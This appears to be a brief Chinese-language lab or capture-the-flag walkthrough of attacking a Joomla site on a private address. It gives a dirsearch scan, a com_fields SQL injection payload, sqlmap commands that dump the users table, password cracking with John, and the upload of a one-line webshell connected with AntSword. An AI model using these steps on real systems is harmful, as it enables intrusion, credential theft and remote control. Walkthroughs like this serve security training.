IP扫描
端口扫描
访问80端口
dirsreach目录探测
dirsearch -u http://192.168.237.157
发现后台登录页面
后台登录页面
发现后台cms框架,百度一下joomla框架有什么漏洞
文章地址
https://www.cnblogs.com/arrest/articles/17660026.html
发现有sql注入漏洞,直接把他的poc拿过来用
/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=extractvalue(666,concat(0x3a,version(),0x3a))
sqlmap
sqlmap -u "http://192.168.1.157/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=extractvalue(666,concat(0x3a,version(),0x3a))" --dbs
获取数据库
sqlmap -u "http://192.168.1.157/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=extractvalue(666,concat(0x3a,version(),0x3a))" -D joomladb --tables
获取表名
sqlmap -u "http://192.168.1.157/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=extractvalue(666,concat(0x3a,version(),0x3a))" -D joomladb -T “#__users” --columns
获取列名
发现用户名和密码,利用kali自带的john工具解密
先将密码保存到txt文件中
john工具
登录
bezz
发现文件上传功能点
新建文件
写入一句话木马
蚁剑进行连接